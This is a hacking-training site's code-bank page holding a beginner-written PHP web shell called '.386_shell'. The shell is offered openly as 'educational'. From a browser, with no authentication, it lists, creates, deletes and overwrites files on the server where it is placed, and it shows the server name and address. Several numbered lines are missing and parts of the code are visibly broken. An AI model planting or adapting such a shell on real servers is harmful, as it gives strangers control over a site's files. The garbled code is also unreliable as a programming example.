EG Information

Main Index
EG Manual
Disclaimer
Legal Information
Hall of Fame
Hall of Shame
Member Rankings
Members List
Meet the Staff

Training Missions

Read Me First
Basic Skills
Realistic Scenarios
Cryptography
Software Cracking
Linux ELF Binary Cracking
Logical Thinking
Programming
Captcha Cracking
Patching
Steganography
Deface This Wall
/dev/null
/dev/urandom
/dev/extra

Knowledge Bank

Discussion Forums
Exploit Database New
PasteBin New
RSS Feeds RSS
Articles / Tutorials
Videos
Online EG MP3 Player Radio
Downloads
Tools

Code Resources

Submit Code
Ajax
ASM
Bash
C
CPP
Csharp
Delphi
Haskell
Java
Javascript
Jython
Lisp
mIRC
MySQL
Perl
PHP
Python
QBASIC
VisualBasic

Pimp Us Out!

Review enigmagroup.org on alexa.com

Has Enigma Group Helped You? Then Help Us By Advertising For Us. Place One Of The Following Images On Your Site And Create A Link Back To Enigma Group.

Enigma Group

Enigma Group

Enigma Group

Enigma Group

 

Affiliates



The Urinal

hackhound.org

suck-o.com

hack.org.za

flyninja.net

 

Enigma Group's Code Bank


.368_shell

By: mediocre  -  Date Submitted: 2008-06-05 06:29:44

  1. <html>
  2. <?php
  3. /********************************************************************************************************************************
  4. .about_386_shell
  5.  
  6. .386_shell was written by mediocre. 
  7. Purely educational, of course.
  8.  
  9. It's actually not all that.
  10.  
  11. I suppose you could use it as:
  12.  - an alternative content management system
  13.  - a source of (very) basic whois information (e.g. ip address and server name)
  14.  - whatever you want, providing you're willing to implement the new features :P
  15.  
  16. It's a reasonably simple script, because when I made this i'd been learning PHP for about 2 days with no prior knowledge of any programming language. 
  17. All code was written from scratch (and with great difficulty).
  18.  
  19. Please scrutinize my code and bad programming habits and PM me or whatever.
  20. Plus, let me know of any additions or changes that could be made to improve it.(Especially the slight lag problem when editing files on the server.)
  21.  
  22. ~mediocre
  23. ***********************************************************************************************************************************/
  24.  
  26. <body bgcolor="#000000" text="#99FF00" link="#99FF00" vlink="#99FF00" alink="#99FF00">
  27.  
  28.  
  29. <br />
  30. <font face="Arial" size="48px">.386_shell</font>
  31.  
  32. <p align="center">
  33. <tt>
  34. ';
  35. ?>
  36. <table width ="95%" align="center">
  37.   <tr align="center">
  38.     <td>
  39.       <tt>.<b>filename</b></tt>
  40.     </td>
  41.  
  42. <?php
  43. $action = $_GET['action'];
  44. $url = $_SERVER["SERVER_NAME"];
  45. $ip = $_SERVER["SERVER_ADDR"];
  46. $del = ".delete";
  47. $view = ".create_new_file";
  48. $mkdir = ".create_new_dir";
  49. $edit = ".edit";
  50. $upload = ".upload";
  51.  
  52. ?> 
  53.  
  54. </tr>
  55. </table>
  56. <?php
  57. $handle = '/testarea';
  58. if ($handle = opendir('.')){
  59. 	while (false !== ($file = readdir($handle))){
  60. 		if ($file !== '.' && $file !== '..')
  61. 		echo "
  62. 		<tt>
  63. 		$file<br /> 
  64. 		</tt>";
  65. 		}
  66.  
  67. 	closedir($handle);
  68. 	echo "</tr>
  69. 	</table>";
  70. }
  71. ?>
  72. </p>
  73. <br /><br /><br />
  74. <?php
  75. //Create Box
  77. <p align=\"center\">
  78. $view<form action=\"\" method=\"post\"><input type=\"text\" name=\"viewthisfile\" size=\"30\"><br />
  79. <input type=\"submit\" value=\"Create\">
  80. ";
  81.  
  82. echo "<br /><br />";
  83. echo "</p>
  84. ";
  85.  
  86. $viewfile = $_POST['viewthisfile']; //$viewfile value is that of the textbox "viewthisfile".
  87.  
  88. if (is_file($viewfile)) {
  90. <p align=\"center\">" . "\"" . $viewfile . "\"" . " is already a file.<br />Enter a different name to continue.
  91. </p>
  92. ";
  93.  
  94. }
  95. elseif ($viewfile != ""){ //Else If $viewfile does not equal "", do this:
  96. $emptymess = "
  97. This message has been displayed in order for you to open this file.\n\nPlease delete it and continue as normal.
  98. ";
  99.  
  100. $viewfilehandle = fopen($viewfile, "w") or die("Could not find $viewfile.<br /> Created $viewfile");
  101. //Create filehandle named $viewfilehandle.
  102. //Open $viewfile for writing, if error, display error message.
  103. fwrite ($viewfilehandle, $emptymess);
  104. fclose($viewfilehandle); //Close file.
  105.  
  107. <p align=\"center\">" 
  108. . $viewfile . " created.
  109. </p>
  110. ";
  111. }
  112.  
  113. $viewfile = "";
  114. /* never worked these bits, fix them if you want:
  115. //MKDIR Section
  116.  
  117.  
  118. //Upload box HTML
  119. ?>
  120. <p align="center">
  121. <?php echo $upload; ?><br /><br />
  122.   <form enctype="multipart/form-data" action="" method="post">
  123.   <input type="hidden" name="MAX_FILE_SIZE" value="2147483647">
  124.   <input type="file" name="uploadbox" size="30"><br />
  125. <!-- 
  126.   <input type="text" name="target" size="30" value="/"><br />
  127. -->
  128.   <input type="submit" value="Upload">
  129.   </form>
  130.  
  131. <?php
  132. //Upload box PHP
  133. $dir = "upload/";    //$_POST['target'];
  134. $ufile = basename($_FILES['uploadbox']['name']);
  135. $uploadtarget = $dir . $ufile;
  136.  
  137.  
  138. if ($ub != ""){ //If something got put in the textbox named "uploadbox", do this:
  139.   if (move_uploaded_file($_FILES['uploadbox']['tmp_name'], $uploadtarget)){
  140.   echo $ufile . " was succesfully uploaded to " . $dir . "." . "</p>";
  141.   }
  142.   else { //Else do this:
  143.   echo "Error uploading " . $ufile . " to " . $dir . ".</p>"; //Show error message
  144.   }
  145. }
  146.  
  147. $ub = $_POST['uploadbox']; //variable $ub is equal to uploadbox's value 
  148. */
  149. ?>
  150.  
  151. <?php
  152. //Delete Box
  154. <p align=\"center\">
  155. $del<br><br><form action=\"\" method=\"post\"><input type=\"text\" name=\"deletethisfile\" size=\"30\"><br />
  156. <input type=\"submit\" name=\"delsubmit\" value=\"Delete\">
  157. ";
  158.  
  159. $delfile = $_POST['deletethisfile'];
  160.  
  161.  
  162. if ($delfile != "")
  163. {
  164.   if (is_file($delfile)){
  165.     echo "<br /><br />";
  166.     $size = intval(filesize($delfile)/1000) . "kb";unlink($delfile) or die("Error. Could not delete $delfile.");
  167.     echo $delfile . " deleted (" . $size . ").
  168.     "; 
  169.     }
  170.     else {
  171.     echo "<br /><br />" . "\"" . $delfile . "\"" . " does not exist.<br />Could not delete " . "\"" . $delfile . "\".";
  172.   }
  173. }
  174.  
  175. //Edit box
  176. $startmess = "";
  177. $emptymess = "
  178. This message has been displayed in order for you to open this file.\n\nPlease delete it and continue as normal.
  179. ";
  180.  
  181. $save = "stn.txt";
  182. $anything = "386shell";
  183.  
  184. if (is_file($save)){
  185. $savethename = $save;
  186. $stnhandle = fopen($savethename, 'r');
  187. $startmess = fread($stnhandle, 1024);
  188.  
  189. $anyhandle = fopen($savethename, 'w');
  190. fwrite($anyhandle, $anything);
  191.  
  192. fclose($stnhandle);
  193. }
  194.  
  195. if ($_POST['editthisfile'] != "") {
  196. $etf = $_POST['editthisfile'];
  197. 	if (is_file($etf)){
  198. 	$etfhandle = fopen($etf, 'r');
  199. 		if (filesize($etf) == 0){
  200. 		$quickwrite = fopen($etf, "w");
  201. 		fwrite($quickwrite, $emptymess);
  202. 		fclose($quickwrite);
  203.  
  204. 		$ed = fread($etfhandle, filesize($etf)) ;
  205. 		fclose($etfhandle);
  206. 		} else {
  207. 		$ed = fread($etfhandle, filesize($etf)) ;
  208. 		fclose($etfhandle);		
  209. 		}
  210. 	} else {
  211. 	$errormess = "Error. Could not open \"$etf\". \"$etf\" does not exist.";
  212. 	$errormess = stripslashes($errormess);
  213. 	}
  214.  
  215. }
  216.  
  217. 	$startmess = $_POST['editthisfile'];
  218. 	$startmess = strip_tags(trim($startmess));
  219.  
  220. 	$savethename = $save;
  221. 	$stnhandle = fopen($savethename, 'w');
  222. 	fwrite($stnhandle, $startmess);
  223. 	fclose($stnhandle);
  224.  
  225. if (isset($_POST['bang'])){
  226. 	$modmess = "\"$startmess\" modified.";
  227. }
  228.  
  229. if (isset($ed)){
  230. echo "<form method=\"post\" action=\"\" name=\"editform\"><br /><br />$edit<br /><br />
  231. <input type=\"text\" name=\"editthisfile\" size=\"30\" value=\"$startmess\"><input type=\"Submit\" value=\"View Source\"><br />
  232. <textarea name=\"editcode\" rows=\"10\" cols=\"50\">$ed</textarea><br />
  233. <input type=\"submit\" name=\"bang\" value=\"Edit\">
  234. </form>
  235. $modmess
  236. <br />
  237. ";
  238. 	$etf = $_POST['editthisfile'];	
  239.  
  240. 	if (isset($_POST['bang'])) {
  241. 	$striped = stripslashes($_POST['editcode']);
  242. 	$stripy = fopen($etf, 'w');
  243. 	fwrite($stripy, $striped);
  244. 	fclose($stripy);
  245.  
  246. 	}
  247.  
  248. } else {
  249. echo "<form method=\"post\" action=\"\" name=\"editform\"><br /><br />$edit<br /><br />
  250. <input type=\"text\" name=\"editthisfile\" size=\"30\" value=\"$startmess\"><input type=\"Submit\" value=\"View Source\"><br />
  251. <textarea name=\"editcode\" rows=\"10\" cols=\"50\"></textarea><br />
  252. <input type=\"submit\" name=\"bang\" value=\"Edit\">
  253. </form>
  254. $errormess
  255. ";
  256. }
  257.  
  258.  
  259. ?>
  260.  
  261. <?php
  263. <p align=\"center\">
  264.   <b>.server_name</b><br />
  265.   : : $url : :<br />
  266.   <br />
  267.   <b>.server_addr</b><br />
  268.   : : $ip : :
  269. </p>
  270. ";
  271. ?>
  272. </body>
  273. </html>
Comments [0]
Return to php category list
Find Us on Facebook! Find us at Facebook! - Follow Us! Follow us with Twitter! - Make sure to Stumble us! Stumble upon us! - Subscribe! Subscribe to our feed!

Who Visited EnigmaGroup Today?

1502 Guests, 297 Users (188 Spiders)
theanonymous21, Taireegaddita, mongrel88, Taicadine, alexelixir, c_a13, Abhinav2107, hizImmoli, scifics, slchill, spartanvedicrishi, KELATALFTUS, kynapse, Tonyui, Hackpad, Epilioptiop, VireekadiaFap, Mamorite, IodindDog, brunoriversyhn, Effomeidonize, ReottphoffBom, arktek, burgeoningneophyte, TradaGreant, SlayingDragons, Waldlyeps, Arsenal, CJ_Omaha, CreedoFiegree, Ryuske, thethird3y3, todayadvila, pwnpwnlolz, NeetaexomYgom, ookami-namikaze, dot_Cipher, Unotohumsmush, SaubymorRoyab, bivaEmilltite, loltyg, Ausome1, Rik, hrangel, cyber-guard, Meonkzt, mori, 31415926, optioniLele, intorerse, FlifobbyFloks, Ios, saraf, Røgue, cossyDrybrich, IvanDimitriev, havisham, KIKNWING, fitz, fleeloCycle, hackboy302, strudels, CootoDorbeeft, gymnediny, hustleman9tv, comando300, Ysri13, thatoneguy, Paran0id, whoami, Pitanteerve, r0z4, Reapon, cls777, myfabregas, Afrika, suetekh, somebody777, floontiny, Frudopvia, jasonbourne, zombiehack640, CloverCipher, spoosh, Fraubbova, rulebreaker, dncjor, obencefoozy, Fintyoptots, viRuleNt, NipPaineHainy, TheHarrisonW, Jamesgo, TheGanjator, psychomarine, 1421carter, tingle65, claudius, Feld Grau, Partisan, Gunslinger, gydeqqzpn, yshiau, Zaccarato, chromoSone, priovasashCor, ellisp, GothicLogic, keetone, M0rdak, UsedDeteKef, nhorton, archestraty, HatriteBeft, JC06dc5, alpha1, spg, dark_void, wakazi, mtroscheck, TheCheeseDemon, ach.n30, sahariar, hervelegeraf, Psiber_Syn, hackaday, Mod777, neompenly, pollolololo, SnoopSky, Cigmimifs, DrOptix, ProloG-Shaman, unicornrainbow, cheapnikeshoxog, bobsters, foofthoorgo, polemarchos, avacraft, spencerwilliams23, lotato, ryanjcrook, dollerolf, robintenboden, rospark, WexEmbet, BeefSupreme, Hessesian, whydoyoulook, cdpirate, DnA-Ender, CaNcEr, zheincnoob, Vengeance987, justforfun363, RawTeefecycle, Squissesk, aVoid, SaMTHG, neodude, Marion1p, Ops, ddxc, BlAd373, Klosse, khamhou, samsatHD80, PauffPubadvic, AnnaNoult, SexyCreerve, newb1, robster1977, Blizer, Dudleypagrove, Mr_KaLiMaN, FirewallPenetrator, GMo, Seasharp, mrchicken1, Zaxem, N4g4c3N, MaxMeier, Ian, sander.ashwin, Predatorc, lonely.connection, ElEnfermado, wavyd, dirkdanblue, cve916, drag0n, kalak55, a1los, jell0, Exclaw, veceattainc, Muselele, Mr Pacifist, stylish007, zach, litbk, closednetwork99, soroimmuror, memoryshot, PlaneReaction, Wamemanytex38, DieAble, d0seN_36b, jeremy.whitson, lol, nefeolnb, Noticon, statix, anandoump, RomeoG, advilapyday, snorapa, Gkjt, autotuneuser, beanulpinee, 2142, kiklopas, door51, Pizza, deepakkumar, makler2004, M4rcy, Xargos, bdkoenig, Blavatsky, m4f10, Huasca, itsme, xu_lain, Nikhil, ChewBigRed, samxoxo, incicaMaidits, toudioria, Chidokage, Jigoku, cesecyclelm, schn1ffl3r, sam20000, learning, kentora, San Marino, Nightraven, zanydouner, FrofErrodslot, FatalEror, wheaties, akki, AlexDiru, unclejos666, override101, blink_212, uncowstientee, lilkpoigogs, Innonaenupt607, Killshot, ZheIncKnight, ActictGlync, acarseflalk, ___, trashsporn, Memartent, Zoorsornaks, z3z3, heyhey123, Ghajnm, usaliaPels, Ordeptpen, pelly, quellense, Szuba, nmobin27, lamb, x1rt4m, ToutousaRulty, vipervince2002, mannavard1611, BinaryShinigami, Duchdund, afgnumgt, Anatissa, greatg, darkfire1515, bennyblanco5000, Mmmett50, ToryLogsEsoff, impalwinona, Kelsfednege, ensubbrut, ant0601, Alpha0mega, pbarwim
 
Enigma Group